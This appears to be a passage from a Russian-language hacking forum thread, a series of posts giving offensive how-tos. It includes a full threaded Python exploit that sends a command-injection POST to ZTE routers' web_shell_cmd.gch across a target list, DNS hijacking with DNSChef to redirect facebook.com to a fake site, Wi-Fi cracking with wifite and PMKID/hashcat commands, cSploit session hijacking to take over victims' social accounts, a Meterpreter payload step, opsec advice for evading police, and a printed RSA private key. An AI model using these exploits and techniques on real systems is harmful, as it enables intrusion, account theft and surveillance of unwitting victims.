питон-подобный язык, но встречается крайне редко. Как мы видим, новая версия инструмента дает нам немало преимуществ и уникальных функций.
  15. В данной статье расскажу почему не стоит нигде показывать свой ип адрес. А также покажу сервисы, которые помогут узнать какую-то информацию об айпишнике. Опасность IP-адреса Начну рассказ с весьма необычным раскладом. Уверен вы знаете отдел К. Именно тот отдел, занимающийся кибер преступлениями. Представим такую ситуацию, вы взламываете сайт. Большой и толстый сайт. Потом нашли дырку в системе, смогли подключиться, но оказывается не включили различные средства защиты, как прокси и впн. Из-за огромного желания срубить много денег. Конечно первое время все будет хорошо, наслаждение жизнью. Вычислив вас, наряд будет ожидать. Как не удивительно, за подобные преступления отвечает отдел К. Теперь переходим к более стандартному примеру, допустим как зная IP-адрес узнать оператора. Чтобы это сделать необходимо использовать данный ресурс - https://www.reg.ru/whois/. С помощью него можно узнать регистрационные данные, оператора и т. п. Показывает вам большую строку информации об айпи. Всего в пару кликов возможно получить немало данных, используя один ресурс. Сейчас расскажу о парочке других сайтах, которые дадут возможность получить информацию о IP. Htmlweb.ru – сервис помогает определить местоположение IP-адреса. Также предоставляет информацию о провайдере, телефоне и т. п. Getipintel.net – ресурс помогает определить вероятность использования средств анонимность у айпи-адреса Ip-score.com – сайт поможет узнать связь между вашим айпи, и причастность к спам-атакам Ipqualityscore.com – Проверяет айпишник на использование различных средств по типу: прокси и впн. Неплохая информация и подборочка ресурсов, которая поможет не только в черных делишках, но и в вашей же безопасности. Вы сможете узнать какую-то открытую информацию и сделаете определенные выводы.
  16. Всем привет, сейчас я вам расскажу о DNSChef. Это прокси днс, с помощью которого мы сможем подменить настоящий днс на фейковый. Итак, DNS-сервер это тоже своего рода компьютер, на котором сохранены все IP-адреса. Например когда мы хотим зайти на какой-то сайт и вводим ссылку в строку, то мы обращаемся к DNS-серверу и говорим: “Железка, мы хотим IP-адрес, на котором находится этот сайтик”, он дает на IP-адрес, далее мы по нему перенаправляемся и уже переходим на сайт. Объяснил я довольно грубо, но зато понятно обычному человек. Если мы подменим DNS-сервер в роутере, то он останется рабочим, но прикол в том, что мы сможем направлять пользователя на любой другой сайт. Например если мы подменим DNS-сервер, то при попытке допустим зайти на сайт – facebook.com, жертва получит не реальный адрес, а фейковый, который перенаправит его на наш сайт. Что нам понадобится: 1. VPS-сервер, на которым мы сможем подменить DNS-сервер и поставить фейковый сайт. 2. Роутер, который имеет возможность смены DNS-сервера, если не ошибаюсь, то во всех современных роутерах такая функция имеется. 3. DNSChef Установка и настройка DNSChef Первым делом нам надо установить DNSChef, поэтому начнем с него. Я буду устанавливать его на VPS-Ubuntu. Вы же можете выбрать самостоятельно VPS и поставить его на необходимую вам операционную систему. Хостера вы также можете выбирать самостоятельно, но рекомендуется, чтобы он находился за пределами России. Если говорить о российских, то могу выделить ihor.ru, если же выбирать из зарубежных, то рекомендую zomro.com Также советую вам установить панель VestaCP, чтобы было удобнее настраивать, добавлять домены и базы данных. Надеюсь с этим вы справитесь. Далее нам нужно установить эту утилиту. Из этого можно понять, что DNSChef Нормально запустился. Дальше нам нужно стартануть и указать, какой домен будет является ненастоящим и где будет находится его IP-адрес. Подмена DNS в роутере и создание домена Когда вы все закончили, нам нужно будет поменять IP-адресс в роутере. Как это делается, вы можете узнать в интернете. Отлично, мы все сделали, теперь добавляем наш ненастоящий домен в VestaCP. Домен готов, так как мы используем VestaCP, он самостоятельно проведет настройку и поставит его на виртуальный хостинг. Как пример создаем файл в папке с facebook.com. Отлично, когда кто-то будет подключен к интернете через данный роутер, на котором совершена подмена, то при входа на различные сайты все будет в порядке, но если пользователь попытается зайти в facebook.com его перебросит на наш сайт.
  17. Порой необходимо проанализировать какую-то вредоносную программу на базе Андройд, но чтобы это сделать, необходимо в первую очередь снять дамп с сетевого трафика. Если вы подключены к сети WiFi, то проблем у вас никакой не будет, сделать это очень легко. Однако существуют такие программы, которые могут запускаться и выполнять вредоносные операции только через мобильную сеть. В таких случаях отличным вариантом будет воспользоваться захватом трафика с помощью сниффера, который будет установлен на нашем устройстве. Прямо сейчас я расскажу о том, как же установить сниффер tcpdump на Андройд. А также я покажу, как с помощью данного сниффера можно снять дамп. Статья не большая, но информация довольно сложная и понять ее сможет только опытный пользователь. Установка и запуск tcpdump Итак, первым делом вы должны знать, что для работы сниффера на устройстве должен быть root. Как только вы получите root нам нужно будет скачать скомпилированный для Android бинарный файл tcpdump. Скачать его можно перейдя по этой ссылке - https://www.androidtcpdump.com/android-tcpdump/downloads Теперь нам нужно установить утилиту на наш смартфон Далее в консоль shell Теперь необходимо выбрать какой-либо доступный интерфейс захвата Запускаем захват и сохраняете вывод на sdcard/dump.pcap Когда вы выполните операцию вы можете скачать дамп используя adb Скачанный файл можно просмотреть с помощью любого сниффера, как пример можно привести распространенный сниффер – WireShark. Если вы не знали, то сообщаю вам, что у этого сниффера есть версия для Андроид – Shark. Думаю на этом можно закончить, информации не так много и делать не особо сложно, но все таки иметь представление об этом нужно чтобы разобраться. Когда вы все поймете, то без проблем сможете анализировать мобильный трафик, делать дампы и так далее. Надеюсь я вам помог и направил вас в решении каких-то личных задач и проблем.
  18. Всем привет, сейчас расскажу об отличном инструменте, который поможет вам во взломе WiFi – wifite. Это крайне маленький гайд, все предельно просто и ясно даже новичку. Данную утилиту можно найти по стандарту в кали линукс, поэтому спокойно этот способ подойдет даже для телефонов. Вся информация лишь для ознакомления и возможного создания безопасной оболочки от взломов. Способ взлома весьма стандартный, перехват хеша и деаутентификация. Главный плюс инструмента, то что всю работу он берет на себя и автоматизирует процесс ввода команд. Начнем 1. Запускаем кали 2. Открываем консоль и устанавливаем пользовательскую версию программы, так как стандартная уже не обновляется. 3. Когда будет установлена, пишем – cd wifite2 и заходим в корень к инструменту 4. Чтобы запустить: ./Wifite.py Наша карта теперь автоматом перевелась в режим мониторинга, моментально сканируются ближайшие сети, ожидаем обнаружения нужной. 5. Выбираем сеть, которую собираемся подвергнуть атаке. 6. Клацаем ctrl+c прописываем номер сети или несколько номеров. 7. Начинается деаутентификация и перехват хэндшейков, ожидаем некоторое время. После перехвата мы увидим уведомление, если выбрано несколько сетей, процесс повторяется для каждой сети. 8. Полученный хеш мы можем расшифровывать любым доступным способом.
  19. Я хочу рассказать про уязвимость в ZTE роутерах, доступному по URI router_ip:443/web_shell_cmd.gch. Уязвимость заключается в том, что мы посылаем POST-запрос с ошибкой и ее типом, а в ней — код для выполнения. Информация предназначена исключительно для ознакомления. Не нарушайте законодательство. Поехали! import threading import socket import ssl import time import sys info = open(str(sys.argv[1]),'a+') class skid(threading.Thread): def __init__(self, ip): threading.Thread.__init__(self) self.ip = str(ip).rstrip('\n') В этом участке кода мы загружаем необходимые модули для работы эксплойта. Также я сделал, чтобы цели брались из списка, подготовленного нами. В конце я покажу пример запуска эксплойта. И ещё на этом участее кода есть многопоточность. Далее в коде: def run(self): try: f1 = "POST /web_shell_cmd.gch HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: HaxerMen\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: 114\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nIF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=mkdir+hacked&CmdAck=\r\n\r\n" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ssl_sock = ssl.wrap_socket(sock) ssl_sock.connect((self.ip, 443)) ssl_sock.sendall(f1.encode('utf-8')) ssl_sock.close() time.sleep(3) print("[Pwned]" + self.ip) except Exception as e: print(e) return мы передаём переменной f1 — payload, отправляя POST-запрос на /web_shell_cmd.gch с ошибкой, где в типе ошибке уже содержится payload. Для примера я просто сделал команду, которая создаёт папку hacked. Далее идут SSL-сокеты, которые отправляют payload устройствам из списка. При успешной передаче команды роутеру ZTE выводится надпись Pwned + IP роутера. Слэшы и точки должны быть в hex формате, а пробелы — заменяться знаком +. Далее в коде идёт простая функция, которая просто запускает эксплуатацию роутеров: for ip in info: try: time.sleep(0.01) skid(ip).start() except: pass Пример запуска: python exploit.py zte Где zte — это список IP адресов роутеров ZTE. Тип записи IP роутеров ZTE в список: 192.168.1.1 192.168.1.2 192.168.1.3 Исходный код эксплойта: import threading import socket import ssl import time import sys info = open(str(sys.argv[1]),'a+') class skid(threading.Thread): def __init__(self, ip): threading.Thread.__init__(self) self.ip = str(ip).rstrip('\n') def run(self): try: f1 = "POST /web_shell_cmd.gch HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: HaxerMen\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: 114\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nIF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=mkdir+hacked&CmdAck=\r\n\r\n" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ssl_sock = ssl.wrap_socket(sock) ssl_sock.connect((self.ip, 443)) ssl_sock.sendall(f1.encode('utf-8')) ssl_sock.close() time.sleep(3) print("[Pwned]" + self.ip) except Exception as e: print(e) return for ip in info: try: time.sleep(0.01) skid(ip).start() except: pass Эксплойт работает на python2.
  20. Здарова всем, сейчас расскажу и покажу как создать свой onion сайт в сети TOR, располагаться который будет прямо на установленной Kali Linux, никаких хостингов! Но, он будет работать только тогда, когда вы его запустите. Если вы хотите иметь красивый адрес вашего сайта, то начинаем сразу с первого пункта, если это вас не интересует – со второго. Пункт 1 Для работы нам нужна именно старая версия Кали. Для примера я буду использовать 1.0.6 На дальнейших версиях не работала. Найти можно в различных архивах. Нарезаем на болванке или же создаем live usb. Загружаем систему. Ждем подключения сети. После чего за работу возьмется Shallot. Shallot даст вам возможность создавать адреса .onion с определенными настройками. Косок адрес может быть случайным. Для установки делаем следующее. Скачаем Shallot с github Код: wget https://github.com/katmagic/Shallot/archive/master.zip Переходим в директорию Код: cd Shallot-master Дальше Код: ./configure make Производим запуск для примера Код: ./shallot ^name ------------------------------------------------------------------ Found matching domain after 30493976 tries: penistfobso4wxhr.onion ------------------------------------------------------------------ -----BEGIN RSA PRIVATE KEY----- MIICXgIBAAKBgQC+dO6h1GjQD0Hqn2LLBX0kIA9px/CtxV5yxMCjbk773igLvXDu v7N9Kr1FYB+yKuSWL/aCZttLqiqUA4L3cxI5Dgtk3bRKkmZre9qfH9xU9v+RSr5P BQmtp0AMi2wLiZxGggkoqcdIhKC4WWoD1xks0H//f7D+G+rdh4IMOHj7kQIEAPC0 RQKBgAwEVw9kxxu/SIugn3dDXJ2tq8V/uGNMBm02MnhckgvIS6S9wfB60mjy3FG/ SUPCWE/f5pUx8fNb3aPnIg2C5FlSE8hAfzdVBIP5F3S2KacSeCL+DPgCpcM8Tkfh s5AaqHe5Z+cb2pLE/1VXQpnnSQhLuSQFresIMCxnaBjOizzJAkEA4laycqQo2Guu eGkppcdNDRnlI4+bCslp2C4ZOuv8/DaLsQ/UE+RMrhdmJi48bcGBafcQlfewdyvL FpF6cpzjtQJBANdqdFilmRwCi1Ij4Q3dBubjjo5+WzxeZ0A6M6g5HDPFZBuHoXtI LNbSz5ilriQQ8fhKZi1HpwVWhNNLyIB3me0CQCdn1d98SwNP+gIfyvYT5ufxoBfH ElngrkQr4rYhsbCmSorxfen9gxI1hQVy4DsbTfttzSwJmOZ5P/CBG+HPFjUCQQCB gWh+P0wOCUDfkRDXdVd1Tb/7nbPbk8r+VlVgnz7fMNPYzjVkq2DTsRvk8uWTdMwQ bTDrrSiO0Wv5zxmMocT9AkEAkLfNSgZafRVmipGo9Fn78ZqedvZAqfYkwXgoIfrB MEq+FK1D3nyY9QDukbe6uR7k8gTfqTtqiHwIQ5JX7u6v7w== -----END RSA PRIVATE KEY----- Строку “name” заменяется на любое имя, которое захотите. Не забывайте, что чем длиннее слово, тем больше времени понадобится для генерации. Лучше всего не больше 6 символов. Полученные данные нужно сохранить в текстовый документ и сохранить на внешнем носителе. Пункт 2 В терминале вводим по порядку: Код: apt-get install tor apt-get install lighttpd Потом запускаем tor и lighttpd Код: service tor start service lighttpd start Необходимо чтобы они сделали конфигурации, для этого в etc, tor, torrc расскоментируем и привидем к такому виду строчки: Код: HiddenServiceDir /var/lib/tor/hidden_service/ HiddenServicePort 80 127.0.0.1:8080 А ниже впишем вот это: Код: ExcludeNodes {ru}, {ua}, {be} В /var/lib/tor/hidden_service имеется два файла hostname и private_key В первом файле записано имя вашего сайта, а во втором уникальный код. Если пункт 1 не был вами выполнен, то вы должны получить вывод в текстовом документе. Из него нам и нужно вписать необходимые значения. Если вы начинали со 2 пункта, то можете ничего не трогать. К примеру в hostname впишем nameforbso3xx.onion а в private_key: Код: -----BEGIN RSA PRIVATE KEY----- MIICXgIBAAKBgQC+dO6h1GjQD0Hqn2LLBX0kIA9px/CtxV5yxMCjbk773igLvXDu v7N9Kr1FYB+yKuSWL/aCZttLqiqUA4L3cxI5Dgtk3bRKkmZre9qfH9xU9v+RSr5P BQmtp0AMi2wLiZxGggkoqcdIhKC4WWoD1xks0H//f7D+G+rdh4IMOHj7kQIEAPC0 RQKBgAwEVw9kxxu/SIugn3dDXJ2tq8V/uGNMBm02MnhckgvIS6S9wfB60mjy3FG/ SUPCWE/f5pUx8fNb3aPnIg2C5FlSE8hAfzdVBIP5F3S2KacSeCL+DPgCpcM8Tkfh s5AaqHe5Z+cb2pLE/1VXQpnnSQhLuSQFresIMCxnaBjOizzJAkEA4laycqQo2Guu eGkppcdNDRnlI4+bCslp2C4ZOuv8/DaLsQ/UE+RMrhdmJi48bcGBafcQlfewdyvL FpF6cpzjtQJBANdqdFilmRwCi1Ij4Q3dBubjjo5+WzxeZ0A6M6g5HDPFZBuHoXtI LNbSz5ilriQQ8fhKZi1HpwVWhNNLyIB3me0CQCdn1d98SwNP+gIfyvYT5ufxoBfH ElngrkQr4rYhsbCmSorxfen9gxI1hQVy4DsbTfttzSwJmOZ5P/CBG+HPFjUCQQCB gWh+P0wOCUDfkRDXdVd1Tb/7nbPbk8r+VlVgnz7fMNPYzjVkq2DTsRvk8uWTdMwQ bTDrrSiO0Wv5zxmMocT9AkEAkLfNSgZafRVmipGo9Fn78ZqedvZAqfYkwXgoIfrB MEq+FK1D3nyY9QDukbe6uR7k8gTfqTtqiHwIQ5JX7u6v7w== -----END RSA PRIVATE KEY----- В /etc/lighttpd/lighttpd.conf поменяем значения: Код: server.document-root = "/var/www/onion" server.error-handler-404 = "/404.php" server.tag = "Ваше значение" server.port = 8080 $HTTP["remoteip"] !~ "127.0.0.1" { url.access-deny = ( "" ) } server.dir-listing = "disable" Пункт 3 Мы находимся во времена технологий, поэтому использовать движки можно в широких направлениях, в которых необходимы PHP и MySQL, поэтому прямо сейчас мы их добавим. Начнем с установки PHP Код: apt-get install php7.0-cgi Далее в /etc/php/7.0/cgi/php.ini ищем и потом раскомментируем строку: Код: cgi.fix_pathinfo = 1 Теперь в lighttpd нам нужно включить поддержку PHP Код: lighttpd-enable-mod fastcgi lighttpd-enable-mod fastcgi-php Пункт 4 В данном пункте мы установим на наш сайт MySQL, а также модуль PHP позволяющий работать вместе с ним. Код: apt-get install mysql-server php7.0-mysql Изначально MySQL использует для кодировки latin1, хотя многие другие движки работают с UTF-8. Поэтому нам нужно открыть /etc/mysql/my.cnf и добавить в секции [client] и [mysqld] данные строки: Код: [client] default-character-set=utf8 [mysqld] character_set_server=utf8 collation_server=utf8_unicode_ci Пункт 5 В /vat/www/ необходимо создать папку onion. Там мы будем размещать наш сайт. Создаем HTML-страницу для проверки, после чего сохраняем ее под названием index.html Код: Тестовая страница Site Local Тестовая страница. Веб-сервер работает и настроен правильно. Создаем PHP страницу ошибки и сохраняем ее как 404.php Код: 404 Site Local Ошибка 404. Страница не найдена. Произведем перезапуск службы: Код: service tor restart service lighttpd restart service mysql restart Пункт 6 В браузере TOR заходим на наш созданный onion-адрес и сразу замечаем результаты! Было бы неплохо в /root/***/tor-browser_en-US/Browser/TorBrowser/Data/Tor/torrc в самом низу добавить строчку ExcludeNodes {ru}, {ua}, {be} Для запуска сайта вводим строки в терминал: Код: service tor start service lighttpd start service mysql start Установим tor-arm который позволит управлять и вести контроль над трафиком Код: apt-get install arm
  21. Привет всем, сейчас я хочу рассказать вам о том, как же можно украсть учетные записи от социальных сетей с помощью точки доступа и Андройда. Теоретическая часть Итак, передаваемая и получаемая информация шифруется. Нас не должно интересовать как идет передача пакетов, это не входит в нашу статью. Нас должно интересовать, как пакеты совершают обратное действие датаграмм к пользователю. Когда HTTP запрос был обработан, сервер начинает проверку прав клиента на использования GET запросов, если отклик был положительным, то сервер сразу же выдает контент, который был запрошен, после чего совершает его шифрование и отправляет полученные данные обратно. Тот кто ворует дынные не может воспользоваться GET запросом, так доступ к нему имеет только тот, кто владеет данными. Однако, это не значит, что хакер должен самостоятельно отсылать этот запрос, ведь за него это может сделать сама жертва. Для этого нам и понадобится WiFi. Все что нужно – это в определенное время поймать пакет с данными, который как ни крути всегда будет проходить через подсеть, после чего мы записываем куки и у нас все отлично. Чтобы провернуть это дело на Андроид существует cSploit Практическая часть Что же, данная программа официально предназначена для того, чтобы совершать сканирование точек доступа на их безопасность, однако ее способности мы будем применять в другом русле, конечно же все по закону. Помните! Чтобы программа работала ей нужны рут-права а так же библиотеки BusyBox. Инструкция Установка необходимых компонентовУстановка cSploitПосле удачной установки всего необходимого вы сможете увидеть все подключенные устройства к сетиНеобходимо выбрать жертву и нажать по нейПерейти в раздел MITMДалее переходим в раздел сниффер сессийЖдем или убеждаем человека на то, чтобы он зашел в свою социальную сетьПосле входа в аккаунт вы сможете перехватить сессию жертвуОтлично, мы открыли страничку жертву в браузере.Я считаю, что я наглядно вам показал, что совершать такие мелкие взломы совсем не тяжело. Для этого не нужно ни в чем разбираться и быть феноменальным человек, при должной тренировке этому можно научить даже обезьяну. Данная информация предоставлена лишь для ознакомления, и для того, чтобы обезопасить пользователей интернета. Автор не несет ответственности за использование данной информации в корыстных целях.
  22. Привет всем, я уверен, что вы знаете о таком протоколе шифрования как WPA2, который на данный момент является самым распространенным и безопасным протоколам для защиты точек доступа. Однако, небольшое количество людей знает о том, что Wi-Fi Alliance предоставили новейший протокол шифрования, не трудно догадаться, что он называется WPA3 Этот протокол делает скачок в сфере безопасности, но вместе с тем и подрывает способы взлома вайфая. На данный момент протокол не распространяется глобально, поэтому лучше заранее узнать о том, как же его все-таки взломать. И как оказывается, он есть. А сейчас минуточку – данный способ взлома работает не только на новом протоколе WPA3 но и на нашем привычном и старом WPA2. Поэтому данный метод становится и останется актуальным еще длительное время. Главным достоинством данного метода является то, что для взлома не требуется перехватывать хеншейк, а это значит, что проводить взлом можно даже тогда, когда к сети никто не подключен. Начнем: В качестве примера будет рассматриваться взлом на системе Debian Первым делом нам нужно подготовить все необходимые инструменты, будет хорошо, если они уже вас есть. Вот полный список: 1. airmon-ng + airodump-ng 2. hcxdumptool 3. hcxpcaptool 4. hashcat Итак, приступим к самому делу! Сначала нам нужно перевести нашу карту в режим монитора, делается это следующей командой: sudo airmon-ng start wlan0 Чтобы узнать название собственного Wi-Fi интерфейса, нам нужно ввести команду ifconfig Отлично, теперь мы должны перехватывать пакеты благодаря работе программы airodump. Пишем следующую команду: sudo airodump-ng wlan0mon wlan0mon – это наш интерфейс монитора, узнаем мы его когда введем команду ifconfig, как только будет введена первая команда. Мы увидим вот такую вот картину: Из этого обширного списка нам нужно выбрать самый устойчивый. После чего нам нужно сохранить его BSSID Echo “0CB6D2599781” > filter.txt Не забудьте, что BSSID нужно записывать без данных знаков “:” Мы уже близко, переходим к самой важной части этого процесса. Нам необходимо заполучить Pmkid точки, это сделать можно с помощью данной команды: sudo hcxdumptool -o hash -i wlan0mon --filterlist=filter.txt --filtermode=2 --enable_status=1,2 Если вы хотите узнать значения ключей, то вы сможете их прочитать, просто наберите команду hcxdumptool -h Вот список основных ключей: --o hash в нем как раз-таки и хранится необходимый Pmkid. --i wlanomon является интерфейсом карты мониторинга. --filterlist наш ранее сохраненный bssid. Конда вы введете команду, то вы сможете наблюдать примерно такую ситуацию: Теперь, после того как вы заметите надпись [FOUND PMIKD] то сразу нажимаем комбинацию клавиш для копирования в буфер обмена и начинаем процесс расшифровки. Для этого нужно перевести полученный pmkid в читаемый вид для hashcat: sudo hcxcaptool -z hashtocrack hash После этого нам нужно зарядить наш Hascat Для этого мы воспользуется брутом, а это как вы знаете подбор паролей, совершается он с помощью такой команды: sudo hashcat -m 16800 hashtocrack -a 3 -w 3 '?d?d?d?d?d?d?d?d' –force '?d?d?d?d?d?d?d?d' – является маской. С помощью маски вы сможете прочесть доки hashcat Теперь, что перебрать по словарю, пользуемся данной командой: sudo hashcat -m 16800 hashtocrack wordlist.txt --force Хочется сказать о том, что брут производится с помощью видеокарты, благодаря маске из 8 цифр, а если быть точнее, то это более 10 миллионов паролей, и занимает это менее часа. Работа со словарями также довольно быстра.
  23. Привет всем, сейчас я хочу поговорить о том, как можно перехватывать различную информацию из Wi-Fi, и все это с помощью вашего Андроид-смартфона. Предисловие На сколько часто вы подключаетесь к открытым сетям? Я уверен, что у вас не всегда находится возможность положить себе на счет денег, однако, выход интернет в наше время необходимо постоянно. Допустим, вы едете в общественном транспорте, ведете бурную переписку с человеком, которую ни в коем случае нельзя прерывать. Но в один прекрасный момент связь резко обрывается, а рядом только открытая сеть. Вы понимаете, что положить деньги на телефон прямо из транспорта невозможно, поэтому вы подключаетесь к открытой точке. Конечно, если вы не беспокоитесь за кражу вашей информации, то вы спокойно может подключаться. Но если вы хотите сохранить свою конфиденциальность, то вы можете не закрывать эту статью, потому что если у вас смартфон с рут правами, то любой человек нажатием одной кнопки сможет получить данные вашей соц. сети, почты и так далее. Теория Данные отправляются и получается в зашифрованном виде. Цель данной статьи не предусматривает узнавание и понимание того, как пакеты с информацией совершают обмен между пользователями. Нам более необходима обратная сторона. Что ж, как только HTTP запрос обработается, сразу же будет проверка на право использования GET запроса, если будет положительный результат, то сервер найдет необходимую информацию, которую запросит пользователь, после чего поставит его шифр и отправит его обратно. Ток кто ворует информацию, не сможет воспользоваться GET-запросом, так как к данному запросу имеется доступ только у того человека, у которого вы собираетесь похитить информацию. Но это не значит, что вы всегда должны посылать данный запрос, ведь это может сделать и тот человек, который находится с ним в одинаковой подсети. Ею как раз таки и является открытая точка доступа. Все что необходимо злоумышленнику, это просто в определенный момент похитить необходимый пакет с информации, которые ни смотря ни на что пройдет через точку доступа, запишет куки-файлы и все будет в шоколаде. Что совершить данный взлом нам понадобится cSploit для операционной системы Андроид. Практика Сейчас я вам расскажу краткую инструкцию о том, как провернуть все это дело. По официальным данным, данная программа необходима, чтобы анализировать точки доступа на безопасность, но мы же направим возможности утилиты в другое русло. Конечно же в рамках закона. Помните! Чтобы программа смогла запуститься на вашем устройстве, вам понадобятся рут-права, а также такие библиотеки как BuxyBox. Я думаю, что у вас не возникнем вопросов с их установкой. К делу Теперь я по пунктам распишу, что мы будем выполнять. 1.Конечное же установка рут-прав и библиотек BuxyBox. 2.Установка cSploit на ваше устройство. 3.Если все прошло удачно, то после установки программы, то после подключения к сети вы сможете увидеть все подключенный к ней устройства. 4.Теперь мы нахожим жертву и нажимаем на нее. 5.Мы можем увидеть большое количество модулей, с помощью которых мы сможем производить влияние на устройство жертвы, но нам понадобится MITM. Поэтому нам нужно выбрать его. 6. Дальше нам нужно выбрать раздел “сниффер сессий”. 7.Далее, если вы знаете жертву лично, то вы можете задействовать свои навыки социальной инженерии и убедить его в том, чтобы он зашел к себе в “Контакт”, если же нет, то нужно ждать пока он сделает это сам. 8.Когда человек зайдет в собственный аккаунт, то на вашем телефоне сразу же появится список с сессиями, которые были перехвачены, чаще всего она именуется ип-адресом. 9.Теперь нам нужно просто нажать на данную сессию и подтвердить перехват. 10.Появися браузер, где будет открыта страничка жертвы. Поздравляю, вы можете читать сообщения, менять информацию и так далее.
  24. Всем привет, хочу обсудить тему анонимных операционных систем, ведь зачастую пользователи считают, что после установки такой ОС, они становятся неуязвимыми. Однако, как вы возможно уже догадались, это суждение является неверным. Скажу больше, оно может стать крайне отрицательным для таких пользователей. Ведь операционная система является лишь инструментом, которым управляете именно вы. Помните, что лучший способ обезопасить себя – это думать собственной головой. Поэтому рассмотрим, что не стоит делать при работе с ОС. 1.Не изменяйте настройки внутри системы, особенно если ты плохо в этом разбираешься. Если вы решили поковыряться в настройках, не имея при этом знаний, то это будет явно не лучшей затеей. Не пытайтесь изменить прокси, авось все будет работать как прежде. Конечно, скорее всего все будет работать, но в случае изменения ты можешь потерять защиту и спалить свой настоящий ИП. Не включайте в TAILS впн не пойми от кого. Если она не поддерживает впн, то это не со зла и не от недобросовестности программистов. А для того, чтобы обезопасить тебя, ведь часто такие впн только ослабят вашу анонимность. 2. Не открывайте входные двери, если вы имеете в распоряжении анонимную ОС. Никаких проверок почты, счетчиков и никаких сходить за сигаретами. Если вы сидите в анонимной системе, то сидите и делайте то, что вам нужно. Если же ты хочешь открыть входную дверь, даже на пару секунд, то тогда вырубай все это дело, прячь и только после этого открывай. По-другому никак, но почему? Все легко. Например вы можете находится под наблюдением у тех, кому необходимы ваши данные. Они прекрасно понимают, что он под шифром. Конечно, они могут ворваться к тебе и сломать тебе пару костей, чтобы ты сказал ключи. Однако для этого понадобится время, за которое вашу пропажу из сети успеют спохватиться ваши соучастники. Но самым простым способом получить зашифрованные данные, это дождаться того момента, когда человек откроет ту самую дверь, с этим наверное справится даже ребенок. 3. Не посещайте сайты, которые не предназначены для работы. Социальные сети, ютуб и прочее сразу же отбрасываем. Тут есть небольшая закономерность, чем больше таких сайтов посетил – тем больше наследил. Поэтому пользуемся только сайтами для работы. Все остальное отсеиваем и делаем на другой операционной системе, где мы эти не занимаемся. 4. Не скачивай файлы и не переноси с других носителей. Если ты пользуешься анонимной операционкой, то абсолютно не желательно что-то скачивать на нее или переносить с флешек. Ведь с данной информацией приходят и проблемы. Конечно, операционка все это забудет, даже вредоносный софт, однако забудет только после ребута. Поэтому если вы стартанете вирус, то он будет работать на протяжении того времени, сколько работали и вы. Но, если все же вам очень нужно перенести информацию, то выполняем следующие пункты: 1.Производим установку пакетов: rkhunter, chkrootkit, clamtk 2. Прозводим обновление базы clamtk 3. Выполняем переноси информации 4. Отключаем компьютер от интернета, я имею ввиду, что нам нужно отключить провод от роутера или от самого устройства. 5. Производим запуск или чтение информации. 6. После чего проверяем всю систему тремя вышеуказанными программами 5. Не используйте свои коронные фразы Наверняка у вас есть какие-то собственные фразы, которые вы часто употребляете сидя на форумах. Если же вы работает в анонимной операционке, то я рекомендую воздержаться от их использования. Ведь это будет являться кросспостингом, с помощью него раскрывают анонимность пользователя в торе. Складывается среднее количество символов, знаков препинания, ошибок, ключевых слов и многое другое. Когда вся эта информация соберется, будет составлен сетевой портрет, после чего по нему начинается поиск в социальных сетях, форумах и так далее. Как показывает практика, практически всегда находят того, кто пытается скрыться.
  25. Всем привет, в данной статье я бы хотел вам рассказать о том, как рядовой пользователь может защищать свое соединение благодаря SSL сертификата. Данный протокол дает возможность безопасного обмена информации между пользователем и сервером. Данные шифруется благодаря открытому ключу. Существует два ключа, которые используются не только для шифрования, но и для расшифрофки информации. То есть если один ключ вы использовали для шифрования данных, то второй будет использован в обратных целях. А это значит, что вы можете принимать тайные сообщения, но секретный ключ хранить вдалеке от всех. Этот протокол пользуется средой, где есть несколько слоев, которые дают ту самую безопасность информации при обмене. Безопасность заключается в том, что сообщения получает определенных пользователь. SSL находится между 2-мя протоколами: протокол самого клиента а также транспортный протокол. Делая, скажем так, ворота с двух сторон, дают необходимую защиту и отправляет информации через транспортные протоколы. Так как SLL является многослойным протоколом, то он может поддерживать большое количество других клиентских протоколов. Состоит SSL их двух слоев. 1 слой – это уровень который подтверждает подключение. Первый же слой состоит из 3 под-слоев: подтверждения подключения, изменение параметров шифра и протокол предупреждения. 2 слой – это уровень, который отвечает за запись информации. После того, как клиент начал работы с сервером SLL, брэндмауер берет SSL запроса от клиента и отправляет его на сервера. Данный сервер в свою очередь отправляет клиенту сертификат, который забирается брэндмауером. Если сертификат является тем, которому наш брэндмауер доверяет, то создается дубликат и отправляется дальше клиенту для проверки подлинности. Итак, как же все-таки создать данный сертификат с помощью Meterpreter, я сейчас расскажу вам несколько пунктов: Скачиваем репозиторий с GitHub После чего запускаем скрипт запуска. Тыкаем на клавишу Enter, после чего делаем попытку создания сертификата. После этого нам нужно выбрать домен. После чего выбираем один из вариантов полезной нагрузки. Вписывает адрес хоста, который будет атаковать, а также порт. Опять выбираем один из вариантов полезной нагрузки. После этих действий будет создан файл, на которым будет иметься полезная нагрузка, а также сертификат PEM PEM – это является самым распространенным вариантом среди центров сертификации. Отлично, теперь просто запускает пайлоад на целевом хосте и получаем долгожданный сертификат SLL.
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.